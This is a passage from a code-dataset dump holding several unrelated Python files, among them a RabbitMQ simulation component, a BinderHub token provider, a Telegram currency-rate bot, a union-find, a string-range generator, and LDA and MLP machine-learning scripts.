unknown message: {}\".format(str(message_object)))\n\n async def simulation_state_message_handler(self, message_object: SimulationStateMessage,\n message_routing_key: str) -> None:\n \"\"\"Handles the received simulation state messages.\"\"\"\n if message_object.simulation_id != self.simulation_id:\n LOGGER.info(\n \"Received state message for a different simulation: '{}' instead of '{}'\".format(\n message_object.simulation_id, self.simulation_id))\n elif message_object.message_type != SimulationStateMessage.CLASS_MESSAGE_TYPE:\n LOGGER.info(\n \"Received a state message with wrong message type: '{}' instead of '{}'\".format(\n message_object.message_type, SimulationStateMessage.CLASS_MESSAGE_TYPE))\n else:\n LOGGER.debug(\"Received a state message from {} on topic {}\".format(\n message_object.source_process_id, message_routing_key))\n self._triggering_message_ids = [message_object.message_id]\n await self.set_simulation_state(message_object.simulation_state)\n\n async def epoch_message_handler(self, message_object: EpochMessage, message_routing_key: str) -> None:\n \"\"\"Handles the received epoch messages.\"\"\"\n if message_object.simulation_id != self.simulation_id:\n LOGGER.info(\n \"Received epoch message for a different simulation: '{}' instead of '{}'\".format(\n message_object.simulation_id, self.simulation_id))\n elif message_object.message_type != EpochMessage.CLASS_MESSAGE_TYPE:\n LOGGER.info(\n \"Received a epoch message with wrong message type: '{}' instead of '{}'\".format(\n message_object.message_type, EpochMessage.CLASS_MESSAGE_TYPE))\n elif (message_object.epoch_number == self._latest_epoch and\n self._latest_status_message_id in message_object.triggering_message_ids):\n LOGGER.info(\"Status message has already been registered for epoch {}\".format(self._latest_epoch))\n else:\n LOGGER.debug(\"Received an epoch from {} on topic {}\".format(\n message_object.source_process_id, message_routing_key))\n self._triggering_message_ids = [message_object.message_id]\n self._latest_epoch_message = message_object\n\n # clear and initialize any variables used to store input within the epoch\n self.clear_epoch_variables()\n\n # If all the epoch calculations were completed, send a new status message.\n if not await self.start_epoch():\n LOGGER.debug(\"Waiting for other required messages before processing epoch {}\".format(\n self._latest_epoch))\n\n async def send_status_message(self) -> None:\n \"\"\"Sends a new status message to the message bus.\"\"\"\n if self._in_error_state:\n # component is in an error state => send an error message instead\n await self.send_error_message(self._error_description)\n return\n\n status_message = self._get_status_message()\n if status_message is None:\n await self.send_error_message(\"Internal error when creating status message.\")\n else:\n await self._rabbitmq_client.send_message(self._status_topic, status_message.bytes())\n self._completed_epoch = self._latest_epoch\n self._latest_status_message_id = status_message.message_id\n\n async def send_error_message(self, description: str) -> None:\n \"\"\"Sends an error message to the message bus.\"\"\"\n self._error_description = description\n self._in_error_state = True\n\n error_message = self._get_error_message(description)\n if error_message is None:\n # So serious error that even the error message could not be created => stop the component.\n LOGGER.error(\"Could not create an error message\")\n await self.stop()\n else:\n await self._rabbitmq_client.send_message(self._error_topic, error_message.bytes())\n\n def _get_status_message(self) -> Union[StatusMessage, None]:\n \"\"\"Creates a new status message and returns the created message object.\n Returns None, if there was a problem creating the message.\"\"\"\n try:\n return self._message_generator.get_status_ready_message(\n EpochNumber=self._latest_epoch,\n TriggeringMessageIds=self._triggering_message_ids)\n\n except (ValueError, TypeError, MessageError) as message_error:\n LOGGER.error(\"Problem with creating a status message: {}\".format(message_error))\n return None\n\n def _get_error_message(self, description: str) -> Union[StatusMessage, None]:\n \"\"\"Creates a new error message and returns the created message object.\n Returns None, if there was a problem creating the message.\"\"\"\n try:\n return self._message_generator.get_status_error_message(\n EpochNumber=self._latest_epoch,\n TriggeringMessageIds=self._triggering_message_ids,\n Description=description)\n\n except (ValueError, TypeError, MessageError) as message_error:\n LOGGER.error(\"Problem with creating an error message: {}\".format(message_error))\n return None\n\n def __set_component_variables(self,\n simulation_id: Optional[str] = None,\n component_name: Optional[str] = None,\n epoch_message_topic: Optional[str] = None,\n simulation_state_message_topic: Optional[str] = None,\n status_message_topic: Optional[str] = None,\n error_message_topic: Optional[str] = None,\n other_topics: Optional[List[str]] = None):\n \"\"\"Sets the topic name related variables for the object. Called automatically from the constructor.\"\"\"\n if simulation_id is None:\n simulation_id = cast(str, EnvironmentVariable(SIMULATION_ID, str, \"2020-01-01T00:00:00.000Z\").value)\n if component_name is None:\n component_name = cast(str, EnvironmentVariable(SIMULATION_COMPONENT_NAME, str, \"component\").value)\n\n if simulation_state_message_topic is None:\n simulation_state_message_topic = cast(\n str, EnvironmentVariable(SIMULATION_STATE_MESSAGE_TOPIC, str, \"SimState\").value)\n if epoch_message_topic is None:\n epoch_message_topic = cast(str, EnvironmentVariable(SIMULATION_EPOCH_MESSAGE_TOPIC, str, \"Epoch\").value)\n if status_message_topic is None:\n status_message_topic = cast(\n str, EnvironmentVariable(SIMULATION_STATUS_MESSAGE_TOPIC, str, \"Status.Ready\").value)\n if error_message_topic is None:\n error_message_topic = cast(\n str, EnvironmentVariable(SIMULATION_ERROR_MESSAGE_TOPIC, str, \"Status.Error\").value)\n if other_topics is None:\n other_topics_from_env = cast(str, EnvironmentVariable(SIMULATION_OTHER_TOPICS, str, \"\").value)\n if other_topics_from_env:\n other_topics = \",\".split(other_topics_from_env)\n else:\n other_topics = []\n\n # NOTE: No checking for the validity of the parameters is done here. If for example the simulation_id is\n # invalid, the component should enter in an error state when trying to create a message.\n self._simulation_id = simulation_id\n self._component_name = component_name\n\n self._simulation_state_topic = simulation_state_message_topic\n self._epoch_topic = epoch_message_topic\n self._status_topic = status_message_topic\n self._error_topic = error_message_topic\n self._other_topics = other_topics\n\n @staticmethod\n def __get_rabbitmq_parameters(**kwargs: Union[str, int, bool, None]) -> Dict[str, Union[str, int, bool]]:\n \"\"\"Returns a dictionary of parameters that can be used with the RabbitmqClient constructor.\n Only those parameters that are not None will be included in the dictionary.\"\"\"\n return {\n parameter_name: parameter_value\n for parameter_name, parameter_value in kwargs.items()\n if parameter_value is not None\n }\n\n @staticmethod\n def __load_start_message() -> Optional[Dict[str, Any]]:\n \"\"\"Tries to load the Start message from a file.\n The filename is gotten from the environmental variable SIMULATION_START_MESSAGE_FILENAME.\n If the message loading is successful, returns the message as a dictionary.\n Otherwise, returns None.\"\"\"\n try:\n start_message_filename = EnvironmentVariable(SIMULATION_START_MESSAGE_FILENAME, str).value\n if isinstance(start_message_filename, str):\n with open(start_message_filename, mode=\"r\", encoding=\"UTF-8\") as start_message_file:\n start_message = json.load(start_message_file)\n if isinstance(start_message, dict):\n return start_message\n\n LOGGER.warning(\"Could not load the Start message from file '{}'.\".format(start_message_filename))\n return None\n\n except (OSError, TypeError, OverflowError, ValueError) as error:\n LOGGER.warning(\"Exception '{}' when trying to load the Start message from file: {}\".format(\n type(error).__name__, error))\n return None\n","sub_path":"domain-messages/simulation-tools/tools/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":30065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"463806281","text":"import re\nfrom tornado.log import app_log\nfrom . import orm\n\n\nclass BinderHubTokenProvider:\n def __init__(self, db):\n self.db = db\n\n def get_user_token(self, request):\n token = self._get_token(request)\n if token is None:\n return None\n orm_token = orm.OAuthAccessToken.find(self.db, token)\n if orm_token is None:\n app_log.warning('No token for %s', token)\n return None\n app_log.debug('Found token for %s', orm_token.user_name)\n return orm_token.user\n\n def _get_token(self, handler):\n token = handler.get_argument('token', None)\n if token is not None:\n return token\n authheader = handler.request.headers.get('Authorization')\n if authheader is None:\n return None\n matched = re.match(r'^Bearer\\s+(.+)$', authheader)\n if matched is None:\n return None\n return matched.group(1)\n","sub_path":"binderhub/oauth/token_provider.py","file_name":"token_provider.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568450868","text":"#!/usr/bin/python3\n\n# @Project = step_LeetCode\n# @File : 1028_Recover_a_Tree_From_Preorder_Traversal\n# @Author : TCY\n# @Time : 2019/8/10 11:21\n# @Email : tangcaiyuan@hust.edu.cn\n# @Software: PyCharm\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def recoverFromPreorder(self, S: str) -> TreeNode:\n stack = []\n i = 0\n while i < len(S):\n level = 0\n while S[i] == '-':\n level += 1\n i += 1\n strx = ''\n while i < len(S) and S[i] != '-':\n strx += S[i]\n i += 1\n x = int(strx)\n\n while len(stack) > level:\n stack.pop()\n node = TreeNode(x)\n if stack:\n if stack[-1].left == None:\n stack[-1].left = node\n else:\n stack[-1].right = node\n stack.append(node)\n return stack[0]\n","sub_path":"Weekly_Contest/Weekly_Contest_132/1028_Recover_a_Tree_From_Preorder_Traversal.py","file_name":"1028_Recover_a_Tree_From_Preorder_Traversal.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"166914055","text":"import re\n\ndef readingLines():\n count = 0\n\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n for line in contents:\n count += 1\n print(\"Line \" + str(count) + \": \" + line)\n except OSError as booboo:\n\n print(\"We had a booboo!!\")\n print(booboo)\n\n\n\ndef readingLinesAndSearch():\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n for line in contents:\n if line.rstrip() == \"Lucy\":\n print(\"-> We found Lucy!\\n\")\n else:\n print(line)\n except OSError as booboo:\n print(\"We had a booboo!!\")\n print(booboo)\n\n\ndef readingLinesWithFind():\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n for line in contents:\n hit = line.find(\"Lucy\")\n \n if hit != -1:\n print(\"-> We found Lucy in the line of text!\\n\")\n else:\n print(line)\n \n except OSError as booboo:\n print(\"We had a booboo!!\")\n print(booboo)\n\n\ndef regExMagic(pattern, string):\n objectMatch = re.search(pattern, string)\n return objectMatch\n\n\ndef readingLinesWithRegEx():\n try:\n with open('people.txt') as file_object:\n contents = file_object.readlines()\n print('\\n')\n for line in contents:\n\n pattern = 'Lucy$'\n if str(regExMagic(pattern, line)) == \"None\":\n print(line)\n else:\n print(\"-- > We found the text: \" + pattern + \", in this line: \" + line + \"\\n\")\n\n except OSError as booboo:\n print(\"We had a booboo!!\")\n print(booboo)\n\n\nreadingLinesWithRegEx() \n","sub_path":"python ch8/read_file_lines.py","file_name":"read_file_lines.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"269036215","text":"from enchant.checker import SpellChecker\nimport sys\nimport decimal\nimport tkFileDialog\nimport time\nfrom Menu import *\n\nclass Primero(QtGui.QDialog):\n archivo = None\n marcado = None\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self,parent)\n self.ui =Ui_Dialog()\n self.ui.setupUi(self)\n QtCore.QObject.connect(self.ui.toolButton,QtCore.SIGNAL('clicked()'),self.Abrir)\n QtCore.QObject.connect(self.ui.pushButton,QtCore.SIGNAL('clicked()'),self.Validar)\n\n def TotalKeyword(self,SKeyword):\n tkeyword = 0\n texto = open(self.archivo, 'r')\n text = texto.readline()\n lista = text.split(\" \")\n total = len(text.split(\" \"))\n for err in lista:\n if err == SKeyword:\n tkeyword+=1\n tempo = decimal.Decimal(tkeyword)/decimal.Decimal(total)\n pkeyword = int(tempo*100)\n pkeyword=str(pkeyword)\n pkeyword+=\"%\"\n return pkeyword\n\n def Errores(self):\n terrores = 0\n texto = open(self.archivo, 'r')\n chkr = SpellChecker(\"es_ES\")\n chkr.set_text(texto.readline())\n for err in chkr:\n terrores+=1\n terrores=str(terrores)\n self.ui.errores.setText(terrores)\n\n def Cuentapalabras(self):\n tpalabras=None\n total=0\n texto = open(self.archivo, 'r')\n text= texto.readline()\n total = len(text.split(\" \"))\n tpalabras=total\n tpalabras=str(tpalabras)\n self.ui.palabras.setText(tpalabras)\n\n def Abrir(self):\n self.archivo = tkFileDialog.askopenfilename()\n ruta=str(self.archivo)\n self.ui.lineEdit.setText(ruta)\n texto = open(self.archivo, 'r')\n self.ui.textBrowser.setText(texto.readline())\n\n def Validar(self):\n self.Errores()\n self.Cuentapalabras()\n self.ui.progressBar.setValue(50)\n time.sleep(2)\n keyword = self.ui.skeyword.text()\n pkey=self.TotalKeyword(keyword)\n self.ui.pkeyword.setText(pkey)\n self.ui.progressBar.setValue(100)\n\n\nif __name__ == \"__main__\":\n app=QtGui.QApplication(sys.argv)\n myapp=Primero()\n myapp.show()\n sys.exit(app.exec_())\n\n","sub_path":"Primero.py","file_name":"Primero.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"397022379","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n利用并查集计算一个图的连通分量数目\n\"\"\"\n\nclass UnionFindSet(object):\n \"\"\"\n 实现一个并查集\n \"\"\"\n def __init__(self, m_nN):\n self.m_nN = m_nN\n self.m_pParent = [i for i in range(m_nN)]\n\n\n def find(self, i):\n \"\"\"\n 找到节点i最终的父节点。\n 该查找改变了原数组。\n :param i:\n :return:\n \"\"\"\n if i < 0 or i >= self.m_nN:\n return -1\n\n root = i\n while root != self.m_pParent[root]: # 尚未找到根节点\n root = self.m_pParent[root]\n\n # 路径压缩(只要查找过一次,路径就被压缩为1)\n t = i\n while t != root:\n p = self.m_pParent[t]\n self.m_pParent[t] = root\n t = p\n\n return root\n\n\n def find2(self, i):\n \"\"\"\n 和find等价,递归实现。\n :param i:\n :return:\n \"\"\"\n if i != self.m_pParent[i]:\n self.m_pParent[i] = self.find2(self.m_pParent[i])\n return self.m_pParent[i]\n\n\n def union(self, i, j):\n \"\"\"\n 合并一条边的节点i和j\n :param i:\n :param j:\n :return:\n \"\"\"\n if i < 0 or i >= self.m_nN or j < 0 or j > self.m_nN:\n return\n ri = self.find(i)\n rj = self.find(j)\n if ri != rj:\n self.m_pParent[ri] = rj\n\n\ndef calcCompoment():\n \"\"\"\n 计算一个图的连通分量数目\n :return:\n \"\"\"\n N = 10\n ufs = UnionFindSet(N)\n ufs.union(2, 6)\n ufs.union(5, 6)\n ufs.union(1, 8)\n ufs.union(2, 9)\n ufs.union(5, 3)\n ufs.union(4, 8)\n ufs.union(4, 0)\n\n\n#查询有多少颗树\n component = [0] * N\n for i in range(N):\n component[ufs.find(i)] += 1\n print(component)\n\n nComponent = 0\n for i in range(N):\n if component[i] != 0:\n nComponent += 1\n return nComponent\n\n\nif __name__ == '__main__':\n print(calcCompoment())","sub_path":"tree/UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"191523583","text":"import requests\nimport json\nimport math\nimport datetime\nimport lxml.html as html\nfrom .core_addon import BotCommand, BotAddon\n\nBINANCE_SYMBOLS = [\n (\"Bitcoin к USDT\", \"BTCUSDT\", \"USD\"),\n (\"Ethereum к USDT\", \"ETHUSDT\", \"USD\"),\n (\"BNB к USDT\", \"BNBUSDT\", \"USD\"),\n (\"Ripple к USDT\", \"XRPUSDT\", \"USD\"),\n (\"Dogecoin к USDT\", \"DOGEUSDT\", \"USD\")\n ]\n\nlink_moex = \"https://iss.moex.com/iss/statistics/engines/futures/markets/indicativerates/securities\"\n\ndef _get_currencies_all():\n r = requests.get(\"https://www.cbr-xml-daily.ru/daily_json.js\")\n if r.status_code != 200:\n return {\n \"status\": \"ERROR\",\n \"code\": r.status_code\n }\n else:\n result = json.loads(r.text)\n result[\"status\"] = \"OK\"\n return result\n\n\ndef _get_currencies_moex():\n r = requests.get(link_moex)\n doc = html.document_fromstring(r.content)\n rows = doc.findall(\".//row\")\n moex_result = {}\n for row in rows:\n moex_result[row.get(\"secid\")] = {\n \"rate\": float(row.get(\"rate\") or 0),\n \"tradedate\": row.get(\"tradedate\"),\n \"tradetime\": row.get(\"tradetime\")\n }\n return moex_result\n\n\n# Currencies is a list of dicts:\n# display - display name (or flag)\n# code - three-letter code of currency\ndef _get_currencies(all_results, currencies, moex=None):\n result_string = \"\"\n if all_results[\"status\"] != \"OK\":\n return \"Что-то пошло не так\"\n timestamp_str = all_results[\"Timestamp\"]\n if \":\" == timestamp_str[-3:-2]:\n timestamp_str = timestamp_str[:-3] + timestamp_str[-2:]\n timestamp = datetime.datetime.strptime(timestamp_str,\n \"%Y-%m-%dT%H:%M:%S%z\")\n result_string += \"Данные на {}:\".format(timestamp.strftime(\"%d.%m.%Y\"))\n for curr in currencies:\n code = curr[\"code\"]\n logo = curr[\"display\"]\n nominal = 1\n if code in all_results[\"Valute\"]:\n nominal = all_results[\"Valute\"][code][\"Nominal\"]\n current = all_results[\"Valute\"][code][\"Value\"]\n previous = all_results[\"Valute\"][code][\"Previous\"]\n name = all_results[\"Valute\"][code][\"Name\"]\n diff = current - previous\n result_string += \"\\n{} {} {}: {} ₽\".format(logo,\n nominal,\n name,\n current)\n if diff > 0:\n result_string += \" (🔺{})\".format(round(diff, 4))\n elif diff < 0:\n result_string += \" (🔻{})\".format(round(diff, 4))\n else:\n result_string += \" (не менялся)\"\n else:\n result_string += \"\\n{} Курс не установлен\".format(logo)\n moex_res = moex.get(\"{}/RUB\".format(curr[\"code\"]))\n if moex_res:\n result_string += \", биржевой курс на {} {} — {:.4f} ₽\".format(\n moex_res[\"tradedate\"],\n moex_res[\"tradetime\"],\n moex_res[\"rate\"] * nominal)\n return result_string\n\n\ndef get_usd_eur(cmd, user, chat, message, cmd_args):\n bot = cmd.addon.bot\n cb_results = _get_currencies_all()\n moex_results = _get_currencies_moex()\n txt = _get_currencies(cb_results, [\n {\n \"code\": \"USD\",\n \"display\": \"🇺🇸\"\n },\n {\n \"code\": \"EUR\",\n \"display\": \"🇪🇺\"\n },\n {\n \"code\": \"CNY\",\n \"display\": \"🇨🇳\"\n },\n {\n \"code\": \"TRY\",\n \"display\": \"🇹🇷\"\n },\n {\n \"code\": \"GEL\",\n \"display\": \"🇬🇪\"\n },\n {\n \"code\": \"KZT\",\n \"display\": \"🇰🇿\"\n },\n {\n \"code\": \"AMD\",\n \"display\": \"🇦🇲\"\n },\n {\n \"code\": \"UZS\",\n \"display\": \"🇺🇿\"\n },\n {\n \"code\": \"THB\",\n \"display\": \"🇹🇭\"\n },\n {\n \"code\": \"RSD\",\n \"display\": \"🇷🇸\"\n }\n ], moex_results)\n bot.send_message(chat, txt, origin_user=user,\n reply_to=message.message_id)\n\n\ndef get_crypto(cmd, user, chat, message, cmd_args):\n bot = cmd.addon.bot\n moex_results = _get_currencies_moex()\n result_string = \"Средние курсы криптовалют на Binance за последние 5 минут:\\n\\n\"\n for cc in BINANCE_SYMBOLS:\n price = requests.get(\n \"https://data.binance.com\"\n \"/api/v3/avgPrice?symbol={}\".format(cc[1])).json().get(\"price\")\n if price is not None:\n fprice = float(price or 0)\n result_string += \"{} — {:.4f}\".format(cc[0], fprice)\n moex_cur = moex_results.get(\"{}/RUB\".format(cc[2]))\n if moex_cur:\n result_string += \" ({:.2f} ₽ по биржевому курсу)\".format(\n moex_cur[\"rate\"] * fprice)\n else:\n result_string += \"Не удалось получить для пары {}\".format(cc[0])\n result_string += \"\\n\"\n bot.send_message(chat, result_string, origin_user=user,\n reply_to=message.message_id)\n\n\ndef cmd_usd_eur():\n return BotCommand(\"currencies\",\n get_usd_eur,\n help_text=\"Текущий курс основных валют к рублю ЦБ РФ\")\n\n\ndef cmd_crypto():\n return BotCommand(\"crypto\",\n get_crypto,\n help_text=\"Текущий курс основных криптовалют на Binance\")\n\n\ndef make_cbrf_addon():\n return BotAddon(\"CBRF\", \"курсы валют\",\n [cmd_usd_eur(), cmd_crypto()])\n ","sub_path":"rpfti_telegram/cbrf.py","file_name":"cbrf.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574928893","text":"import os\nfrom rofi import Rofi\n\n\nbookdir=\"/home/mar/books/\"\nsubject=(\"drawing books\",\"programing\")\nr=Rofi()\nindex1,key =r.select(\"what subject\", subject)\nprint(index1,key)\n\nif index1==-1:\n chosenSubjet=\"\"\n a=os.listdir(bookdir)\nelse:\n chosenSubjet=subject[index1]\n\na=os.listdir(bookdir+chosenSubjet)\nbooks =[b for b in a if b not in subject]\nchosenBookIndex,key =r.select(\"what book\", books)\nos.system('mupdf \"'+bookdir+chosenSubjet+'/'+books[chosenBookIndex]+'\"')\n","sub_path":"scripts/fileOpener.py","file_name":"fileOpener.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506984739","text":"from core.parsing_state import ParsingState\nfrom parsers.base_parser import BaseParser\n\nclass RangeParser(BaseParser):\n \"\"\"This parser handles three kind of range patterns\n\n It handles patterns which are called:\n 1. positional range\n 2. ascii range\n 3. numbers range\n\n Examples\n --------\n Beginning character: '<'\n Ending character: '>'\n\n Example of positional range:\n\n \n\n Result:\n ac\n bc\n cc\n ad\n bd\n cd\n\n Example of ascii range:\n\n \n\n Result:\n ab\n ac\n ad\n\n Example of number range:\n\n <10;13>\n\n Result:\n 10\n 11\n 12\n 13\n \"\"\"\n MAX_ASCII = 126\n MIN_ASCII = 32\n\n def _handle_initialize(self):\n self._to_default()\n\n def _to_default(self):\n self.left_part = []\n self.right_part = []\n self.delimiter = ''\n self.actual_part = self.left_part\n\n #override\n def _handle_start_parsing(self):\n ParsingState.get_instance().start_new_group()\n\n def _handle_end_parsing(self):\n self.__generate_range()\n self._to_default()\n\n def _handle_character(self, character):\n if character in ['-', ';', '%']:\n self.actual_part = self.right_part\n self.delimiter = character\n else:\n self.actual_part.append(character)\n\n def __generate_range(self):\n if self.delimiter == '-':\n self.__generate_positional_range()\n elif self.delimiter == ';':\n self.__generate_numbers_range()\n elif self.delimiter == '%':\n self.__generate_ascii_range()\n\n def __generate_numbers_range(self):\n self.__parts_to_numbers()\n diff = abs(self.left_part - self.right_part)\n for i in range(diff + 1):\n ParsingState.get_instance().add_to_results(str(self.left_part + i))\n\n def __parts_to_numbers(self):\n self.left_part = int(''.join(self.left_part))\n self.right_part = int(''.join(self.right_part))\n\n def __generate_positional_range(self):\n self.__parts_to_ascii()\n self.__generate_positional_by_recursion(0, '')\n\n def __parts_to_ascii(self):\n for i in range(len(self.left_part)):\n self.left_part[i] = ord(self.left_part[i])\n for i in range(len(self.right_part)):\n self.right_part[i] = ord(self.right_part[i])\n diff = abs(len(self.left_part) - len(self.right_part))\n for i in range(diff):\n if len(self.left_part) < len(self.right_part):\n self.left_part.append(RangeParser.MIN_ASCII)\n elif len(self.left_part) > len(self.right_part):\n self.right_part.append(RangeParser.MAX_ASCII)\n\n def __generate_positional_by_recursion(self, position, actual_word):\n if position >= len(self.left_part):\n ParsingState.get_instance().add_to_results(actual_word)\n return\n diff = abs(self.left_part[position] - self.right_part[position])\n for i in range(diff + 1):\n actual_char = chr(self.left_part[position] + i)\n self.__generate_positional_by_recursion(position + 1, actual_word + actual_char)\n\n def __generate_ascii_range(self):\n self.__parts_to_ascii()\n temporary_array_word = list(self.left_part)\n while True:\n actual_word = ''\n for ascii_elem in temporary_array_word:\n actual_word += chr(ascii_elem)\n ParsingState.get_instance().add_to_results(actual_word)\n if self.__same_word(temporary_array_word, self.right_part):\n break\n temporary_array_word = self.__next_word_array(temporary_array_word)\n\n def __same_word(self, first, second):\n result = True\n for i in range(len(first)):\n if first[i] != second[i]:\n result = False\n break\n return result\n\n def __next_word_array(self, temporary_array_word):\n temporary_array_word[-1] += 1\n temporary_array_word = self.__to_proper_base(RangeParser.MIN_ASCII, RangeParser.MAX_ASCII + 1, temporary_array_word)\n return temporary_array_word\n\n def __to_proper_base(self, min_value, base, array_word):\n repeat = False\n for i in range(len(array_word)):\n if array_word[i] >= base:\n array_word[i - 1] += 1\n array_word[i] = min_value\n repeat = True\n break\n if repeat:\n array_word = self.__to_proper_base(min_value, base, array_word)\n return array_word\n","sub_path":"parsers/range_parser.py","file_name":"range_parser.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"407466190","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn.metrics as sk\n\n\n#MAP CLASSIFIER\ndef calc_pdf(x, sigma, mu):\n csigma = (1/(2 * np.pi * np.linalg.det(sigma)**(1/2)))\n A = np.matmul(np.transpose(x-mu), np.linalg.inv(sigma))\n A = np.matmul(A, (x-mu))\n return csigma * np.exp((-1/2) * A)\n\ndef calc_w(mus, sigmas):\n j = mus[0] - mus[1]\n Sb = np.matmul([[j[0]], [j[1]]], [[j[0], j[1]]] )\n Sw = sigmas[0] + sigmas[1]\n\n A = np.matmul(np.linalg.inv(Sw), Sb)\n wLDA, v = np.linalg.eig(A)\n return wLDA\n\ndef project_data(samples, assignments, wLDA):\n print(wLDA)\n print(samples.shape)\n yLDA = np.matmul([wLDA], np.transpose(samples))\n assign_0 = []\n assign_1 = []\n for x in range(1000):\n if assignments[x] == 1:\n assign_1.append(x)\n else:\n assign_0.append(x)\n mean_00 = sum([samples[x][0] for x in assign_0]) * 1/len(assign_0)\n print(mean_00)\n mean_01 = sum([samples[x][1] for x in assign_0]) * 1 / len(assign_0)\n print(mean_01)\n mean_10 = sum([samples[x][0] for x in assign_1]) * 1/len(assign_1)\n print(mean_10)\n mean_11 = sum([samples[x][1] for x in assign_1]) * 1 / len(assign_1)\n print(mean_11)\n\n sign0 = np.sign(mean_10 - mean_00)\n sign1 = np.sign(mean_11 - mean_01)\n\n wLDA = np.matmul([[sign0], [sign1]] , [wLDA])\n yLDA = np.matmul([[sign0], [sign1]], [yLDA])\n\n\n return wLDA[0], yLDA[0]\n\n\ndef generate_samples(N, priors, mus, sigmas):\n # Assign samples and generate values\n samples = np.zeros((N, 2))\n sample_assignments = np.zeros(N)\n for i in range(N):\n rand = np.random.uniform()\n #class 0\n if rand > priors[0]:\n sample_assignments[i] = 1\n samples[i] = np.random.multivariate_normal(mus[1], sigmas[1])\n #class 1\n else:\n samples[i] = np.random.multivariate_normal(mus[0], sigmas[0])\n return samples, sample_assignments\n\n\n\ndef plot_LDA_results(samples, yLDA):\n plt.plot(yLDA[0], np.zeros(N), marker=\"o\", label='Class 0')\n plt.plot(yLDA[1], np.zeros(N), marker=\"x\", label='Class 1 ')\n\n #plt.plot(samples[0], samples[1])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('LDA')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef generateROC_min_risk(N, increments, priors, mus, sigmas):\n \"\"\"This code here is a disaster but it does what it needs to\"\"\"\n\n truePos_vals = np.zeros(increments)\n falsePos_vals = np.zeros(increments)\n index = 0\n for gamma in np.linspace(0, 100, increments):\n print(gamma)\n samples, sample_assignments = generate_samples(N, priors, mus, sigmas)\n classifications = classify_samples_min_risk(samples, mus, sigmas, gamma)\n truePos, falsePos, error = eval_classifications(sample_assignments, classifications)\n truePos_vals[index] = truePos\n falsePos_vals[index] = falsePos\n index += 1\n\n ##ADD MAP VAL\n MAP = priors[0] / priors[1]\n samples, sample_assignments = generate_samples(N, priors, mus, sigmas)\n classifications = classify_samples_min_risk(samples, mus, sigmas, MAP)\n truePosMAP, falsePosMAP, errorMAP = eval_classifications(sample_assignments, classifications)\n print('MAP error', errorMAP/N)\n\n plt.plot(falsePos_vals, truePos_vals, color='darkorange', label='ROC curve ')\n plt.plot([0, 1], [0, 1], color='navy', linestyle='--')\n plt.plot([falsePosMAP], [truePosMAP], color='green', marker='o', linestyle='dashed',\n linewidth=2, markersize=12, label=\"MAP Classifier\")\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC curve')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n\n n = 2 #Dimensions per feature\n N = 1000 #Number of samples\n mu0 = [-1, 0]\n mu1 = [1, 0]\n sigma0 = np.array([[2, 0], [0, 1]])\n sigma1 = np.array([[1, 0], [0, 4]])\n\n mus = np.array([mu0, mu1])\n sigmas = np.array([sigma0, sigma1])\n priors = np.array([0.35, 0.65])\n increments = 150\n\n samples, sample_assignments = generate_samples(N, priors, mus, sigmas)\n wLDA = calc_w(mus, sigmas)\n WLDA, yLDA = project_data(samples, sample_assignments, wLDA)\n plot_LDA_results(samples, yLDA)\n\n","sub_path":"LDA_classifier.py","file_name":"LDA_classifier.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"466563197","text":"\"\"\"Use this to complete part 4\n\n Usage:\n $ python mlp_four_layer.py\n\n\"\"\"\n\n\nimport mlp\n#import matplotlib.pyplot as plt\n\nEPOCHS = 100\n\nif __name__ == '__main__':\n train_loader = mlp.get_cifar10_data(train=True)\n validation_loader = mlp.get_cifar10_data(train=False)\n test_loader = mlp.get_cifar10_test_data()\n \n fl_train_loss1, fl_accv1, four_layer_model = mlp.four_NN_train_and_val(train_loader, validation_loader, epochs=EPOCHS)\n train_loss1, accv1, three_layer_model = mlp.sigmoid_NN_train_and_val(train_loader, validation_loader, epochs=EPOCHS)\n\n #train_loss2, accv2 = mlp.four_NN_train_and_val(train_loader, validation_loader, lr=0.01)\n #train_loss3, accv3 = mlp.four_NN_train_and_val(train_loader, validation_loader, lr=0.001)\n\n epochs = range(1, EPOCHS + 1) \n\n #plt.figure(1)\n #plt.plot(epochs, fl_train_loss1, '-b', label='4-layer w/ sigmoid activation')\n #plt.plot(epochs, train_loss1, '-r', label='3-layer w/ sigmoid activation')\n #plt.legend(loc='lower right')\n #plt.xlabel('Number of epochs')\n #plt.ylabel('Average Negative Log Loss')\n 